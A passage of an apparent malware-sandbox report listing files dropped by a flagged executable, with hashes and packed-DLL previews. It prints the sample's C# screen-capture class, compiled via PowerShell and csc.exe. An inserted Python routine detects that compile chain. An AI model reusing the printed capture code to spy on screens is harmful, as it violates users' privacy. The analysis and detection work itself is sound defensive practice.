                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
Size (bytes):20480
Entropy (8bit):7.550806027936981
Encrypted:false
SSDEEP:384:T6n6Apum7DurKkfFwr37/fgQZtR5DLURkUzLgV5tga2Za7gJXNug8:enppuYrkfIrHZrnDLarYVT4p9u
MD5:EEADED775EABFAAEDE5CA025F55FD273
SHA1:8EEFB3B9D85B4D5AD4033308F8AF2A24E8792E02
SHA-256:DB4D6A74A3301788D32905B2CCC525E9A8E2219F1A36924464871CF211F115A0
SHA-512:A6055D5604CC53428D89B308C223634CD94082BE0BA4081513974E1826775D6E9FC26180C816D9A38FEAD89B5E04C5E7CF729C056BFAE0ED74D6885C921B70AD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):89880
Entropy (8bit):7.909712386269427
Encrypted:false
SSDEEP:1536:XsynT+G0EI+epxbbIdegcKO4q1GLOUIzUre2N75Bq/hIa3BmK/PxsdIVLh3p7SyD:XXQEbepxbbYnf7q1G6Uhre2NNBq/IsAg
MD5:EC28105660F702C7A4A19D2265A48B43
SHA1:2603A0D5467B920ED36FEF76D1176C83953846BC
SHA-256:B546BF126F066A6645AE109D6D08DF911FB77301CC5E6D39434CD24475822AF5
SHA-512:A388A7A5072D34B3477C5BB872F6E1242128BDDB09D87CEAC840615D80F0315EC60FF443CA5FAB590332E43C4BF3D4CE5D3CC63EACA40945110C1888D2A69DCB
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):67352
Entropy (8bit):6.1462717896521335
Encrypted:false
SSDEEP:768:lGw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJa:r/5k8cnzeJd9IVL0v7SyJwx/
MD5:D8BA00C1D9FCC7C0ABBFFB5C214DA647
SHA1:5FA9D5700B42A83BFCC125D1C45E0111B9D62035
SHA-256:E45452EFA356DB874F2E5FF08C9CC0FE22528609E5D341F8FB67BA48885AB77D
SHA-512:DF1B714494856F618A742791EEFBF470B2EEE07B51D983256E4386EA7D48DA5C7B1E896F222EA55A748C9413203886CDE3A65EF9E7EA069014FA626F81D79CD3
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1705240
Entropy (8bit):7.993600008484676
Encrypted:true
SSDEEP:24576:CJY99sOZi/8N8C1CSIJyR4ZRE1Rqq/uQivcHe2Bg5Cmek5CP7uP6zohpLGLZFkh2:9jZiEN8p6ivZUHe2BgcpP7uaor6
MD5:AFFA456007F359E9F8C5D2931D966CB9
SHA1:9B06D6CB7D7F1A7C2FA9E7F62D339B9F2813E80F
SHA-256:4BAB2E402A02C8B2B0542246D9EF54027A739121B4B0760F08CD2E7C643ED866
SHA-512:7C357F43DD272E1D595CCDE87C13FD2CDF4123B20AF6855576BFBA15AFD814A95886CEBBE96BB7781B916F9DB3C3EE02D381036DDBF62095DE3EE43A7F94D156
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):26392
Entropy (8bit):7.44233047444268
Encrypted:false
SSDEEP:384:kUAW1guHrh0h1d4NZa7gJXZjNIVQG86lHQIYiSy1pCQfwug+AM+o/8E9VF0NyciC:kjW1JVpJjNIVQG8S5YiSyv3g+AMxkEdC
MD5:A74E10B7401EA044A8983D01012F3103
SHA1:CDD0AFA6AE1DCEBC9CCFEC17E23C6770A9ABFB8F
SHA-256:78A4B12D7DA7E67B1DC90646B269C3E8DFEA5DC24E5EEF4787FFFD4325FE39D8
SHA-512:A080050B5D966303D2A27CAFCA8CBF83777329A54CA00BBB16EB547EEF4262C9FDF7C828CADB02E952AEB631EC560D1DCE3CF91F387A96DE9E82037F1C3AC47B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):637720
Entropy (8bit):7.993300822314004
Encrypted:true
SSDEEP:12288:pevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2V4G2:p8oy8x4Rl1dRnxeDlZxsl2MsDVr2
MD5:7219D265A3204344CE216344DE464920
SHA1:13E7B7980E17ED5A225B93FFB393F1BC7419AC2E
SHA-256:5821D8BD76212B57EEE95B7ECB5A8381D2FE24AE31164BE03F0F8BF13D5B86D4
SHA-512:D554C881073417DD03334521CA0AFC95716B1A9788E9EE1A0540CE3D7E53132F4EE511C10B05AB090909002294D9648D1D65E994C8D105BFF7142CDCCE1D4B77
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):302872
Entropy (8bit):7.986782854548308
Encrypted:false
SSDEEP:6144:yk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:ykUfQJbUV2MhCwEQc5Np9zQ6
MD5:660EF38D6DE71EB7E06C555B38C675B5
SHA1:944EC04D9B67D3F25D3FB448973C7AD180222BE3
SHA-256:FD746987AB1EA02B6568091040E8C5204FB599288977F8077A7B9ECEFDC5EDB4
SHA-512:26AC7D56E4FB02E43E049C9055979FC6E0E16FAB8F08F619233E12B278F300FAA5FFABAC1D9B71091571A89CDF9ACFEB3478508FBA96EF2E647327215BE6E9D7
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4m..4m..4m..=...2m......6m......9m......<m......7m......7m......6m..4m..em......5m......5m....j.5m......5m..Rich4m..................PE..d......e.........." ...#.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41472
                                                                                                                                                                                                                                                          Entropy (8bit):7.868227278889233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:dU3TLuhvkAahe3LS0HW7A7I57CdTRgbaa34cU29pU:dCFs7S0HW07I57CBRgkcw
                                                                                                                                                                                                                                                          MD5:9A8F969ECDF0C15734C1D582D2AE35D8
                                                                                                                                                                                                                                                          SHA1:A40691E81982F610A062E49A5AD29CFFB5A2F5A8
                                                                                                                                                                                                                                                          SHA-256:874E52CCEAE9A3C967BAC7B628F4144C32E51FC77F519542FC1BAC19045ECDE8
                                                                                                                                                                                                                                                          SHA-512:E0DEB59ABEF7440F30EFFB1AAB6295B5A50C817F685BE30B21A3C453E3099B97FD71984E6CA6A6C6E0021ABB6E906838566F402B00A11813E67A4E00B119619F
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../]..A...A...A.......A...@...A..@...A...D...A...E...A...B...A.[.@...A...@.B.A..`I...A..`A...A..`....A..`C...A.Rich..A.................PE..d....Ype.........." ...%.........`.......p................................... ............`.............................................d...............................................................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):652
                                                                                                                                                                                                                                                          Entropy (8bit):3.0730049765594893
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry9qGak7Ynqq8qXPN5Dlq5J:+RI+ycuZhNyGakSjXPNnqX
                                                                                                                                                                                                                                                          MD5:04E8F26F432EC94FFE8EED63E30E7DCC
                                                                                                                                                                                                                                                          SHA1:6CE77DC910461A7E7428599D9E8D0507474BFE9D
                                                                                                                                                                                                                                                          SHA-256:D71605F734D8CFDB58F64C2E277A079399E8475EF5FD2E0CD47B1FFB833C2D1F
                                                                                                                                                                                                                                                          SHA-512:6DBA8EFB1ACE08B024EFDF00C88AD42C9EB735EBD0FA3C1A61A18C55B8A45D51E7DE33FB1D1D7C89293CBC5E0FF87950F575D5BFD22127155D767A11ACB3C198
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.q.d.d.o.o.n.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.q.d.d.o.o.n.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1004
                                                                                                                                                                                                                                                          Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):607
                                                                                                                                                                                                                                                          Entropy (8bit):5.302207023022631
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOf5L0WZEif59H:V3ka6KOkqeFkOfjEif3
                                                                                                                                                                                                                                                          MD5:B4A3BC3A2E6C12756302D6A08156135F
                                                                                                                                                                                                                                                          SHA1:F35F08BC95C7B770DE3A0C5F8101E37F9E7403DB
                                                                                                                                                                                                                                                          SHA-256:85EED39F14FE8D83E7F6BB1112EE64928F1B84BF15D39601678BF81FBC453061
                                                                                                                                                                                                                                                          SHA-512:28C1995AA858DBAE51067B2FCB42EEC16EDDF35AF1A953C649B3F16620B1FDEBF2C9DBB159B842A5EEC4D51C55B03B60312708897D9ABA593CC4CF3247723681
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.0.cs"
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4096
                                                                                                                                                                                                                                                          Entropy (8bit):3.152283754016436
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:647oEAtf0KhzBU/df6mtJ2N0fpW1ulla35q:oNz0kmeO/3K
                                                                                                                                                                                                                                                          MD5:9986D70705A2DC5B5C50A01DEABD7B65
                                                                                                                                                                                                                                                          SHA1:606163F5A966CE3AB6C5DE90B07095A1D3548A44
                                                                                                                                                                                                                                                          SHA-256:8D750E6C548994D3B7A85CBDCB30151A9ADD4AE2F3039E038BA6840565B14518
                                                                                                                                                                                                                                                          SHA-512:0A39A53579C16930D527AF16BB94BB00D222C3DF7AC4402183F807AF8346B3EAAB99A8326550F95889D6C2CE9C2B9D8212C9008ABD5988756E83200B691DB939
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....tg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (734), with CRLF, CR line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):1155
                                                                                                                                                                                                                                                          Entropy (8bit):5.449810011974728
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:KJfUId3ka6KOkqeFkOfjEif+Kax5DqBVKVrdFAMBJTH:uUkka6NkqeFkyjEu+K2DcVKdBJj
                                                                                                                                                                                                                                                          MD5:499208F60B4D2BC15560E2E69DDE8320
                                                                                                                                                                                                                                                          SHA1:039BF437AA1B85413BCE6C4CF61F681FE3E68DA9
                                                                                                                                                                                                                                                          SHA-256:1A14BDBBD338520C155F1A6D09359B0F474C6ED467FBF7C7BABA88713CA45AD7
                                                                                                                                                                                                                                                          SHA-512:3811014783B0794209510A5B24C46C0F83498B961536656B5336958F17194990220CC17BC92C6A22FC456DA90D3247997E4F728C71A0C1938FE241082D2F7F46
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no
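The entries above record a complete PowerShell Add-Type chain: powershell.exe writes the Screenshot class to iqddoona.0.cs, csc.exe compiles it into %TEMP%\iqddoona\iqddoona.dll with references to System.Drawing and System.Windows.Forms (the assemblies CopyFromScreen needs), and the compiler transcript is captured. This is the artifact behind the "Dot net compiler compiles file from suspicious location" signature in the report's signature list. The following is an added example, not code from Joe Sandbox or from the sample: a detection routine over process-creation records (parent image, image, command line, as Windows 4688 or Sysmon event 1 would supply them) that flags this shape. The first constructed record reuses the csc.exe command line shown above; the field names, the other two records and the severity bands are this example's own assumptions.

```python
"""Detect PowerShell Add-Type compiling capability code through csc.exe (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Add-Type writes %TEMP%\<8 random chars>\<same>.0.cs and compiles it to <same>.dll in that directory.
ADDTYPE_OUT = re.compile(r"\\AppData\\Local\\Temp\\([a-z0-9]{8})\\\1\.dll$", re.IGNORECASE)
POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")
CAPTURE_REFS = {"system.drawing.dll", "system.windows.forms.dll"}  # what Graphics.CopyFromScreen needs


def split_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows tokenizer: whitespace separates, double quotes group and are dropped (no \\" escapes)."""
    tokens, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


@dataclass
class Finding:
    severity: str
    out_path: str
    addtype_dir: Optional[str]
    references: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)


def analyze_csc(event: dict) -> Optional[Finding]:
    """event carries parent_image, image and command_line (assumed field names for a 4688/Sysmon-1 record)."""
    if not event["image"].lower().endswith("\\csc.exe"):
        return None
    out, refs, sources = "", [], []
    for tok in split_cmdline(event["command_line"])[1:]:
        low = tok.lower()
        if low.startswith(("/r:", "/reference:")):
            refs.append(tok.split(":", 1)[1])
        elif low.startswith("/out:"):
            out = tok[5:]
        elif low.endswith(".cs"):
            sources.append(tok)
    reasons = []
    from_ps = event["parent_image"].lower().endswith(POWERSHELL)
    if from_ps:
        reasons.append("csc.exe spawned by PowerShell (Add-Type compiles C# on the fly)")
    m = ADDTYPE_OUT.search(out)
    addtype_dir = m.group(1) if m else None
    in_temp = "\\appdata\\local\\temp\\" in out.lower()
    if addtype_dir:
        reasons.append(f"/out: is %TEMP%\\{addtype_dir}\\{addtype_dir}.dll (Add-Type naming)")
        if any(s.lower().endswith(f"\\{addtype_dir}.0.cs") for s in sources):
            reasons.append(f"source {addtype_dir}.0.cs matches the Add-Type layout")
    elif in_temp:
        reasons.append("/out: points into %TEMP%")
    ref_names = sorted({r.rsplit("\\", 1)[-1].lower() for r in refs})
    has_capture = CAPTURE_REFS <= set(ref_names)
    if has_capture:
        reasons.append("references System.Drawing + System.Windows.Forms (screen capture from a script)")
    if not (from_ps and (addtype_dir or in_temp)):
        return None  # plain builds (MSBuild, devenv, dotnet) never trip this rule
    return Finding("high" if has_capture else "medium", out, addtype_dir, ref_names, reasons)


# Constructed process-creation records; EVENTS[0] reuses the csc.exe command line recorded in this report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
GAC = r"C:\Windows\Microsoft.Net\assembly\GAC_MSIL"
EVENTS = [
    {"parent_image": PS, "image": CSC, "command_line": (
        f'"{CSC}" /t:library /utf8output /R:"System.dll" '
        f'/R:"{GAC}\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" '
        f'/R:"System.Core.dll" /R:"{GAC}\\System.Drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" '
        f'/R:"{GAC}\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" '
        r'/out:"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll" /debug- /optimize+ /warnaserror /optimize+ '
        r'"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.0.cs"')},
    # ordinary build: MSBuild driving csc into a project directory (constructed)
    {"parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Roslyn\csc.exe",
     "command_line": r'csc.exe /noconfig /t:library /R:"System.dll" /out:"C:\src\app\obj\Release\app.dll" "C:\src\app\Program.cs"'},
    # admin script using Add-Type for a P/Invoke helper: Add-Type layout but no GDI/WinForms references (constructed)
    {"parent_image": PS, "image": CSC, "command_line": (
        f'"{CSC}" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" '
        r'/out:"C:\Users\admin\AppData\Local\Temp\kxqzwvyt\kxqzwvyt.dll" /debug- /optimize+ '
        r'"C:\Users\admin\AppData\Local\Temp\kxqzwvyt\kxqzwvyt.0.cs"')},
]

if __name__ == "__main__":
    for ev in EVENTS:
        f = analyze_csc(ev)
        print("no finding" if f is None else f"{f.severity}: " + "; ".join(f.reasons))
```

The rule deliberately scores an Add-Type compile without GDI/WinForms references as medium rather than ignoring it: administrators do use Add-Type for P/Invoke helpers, so a high-confidence alert needs the capability hint (here, screen capture) on top of the PowerShell-to-csc parent chain and the %TEMP% output path. Also watch for the disk artifacts the entries above show: the .0.cs source, the .cmdline file and the compiler output all land in the same random eight-character directory.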
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qn:qn
                                                                                                                                                                                                                                                          MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                                          SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                                          SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                                          SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:blat
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
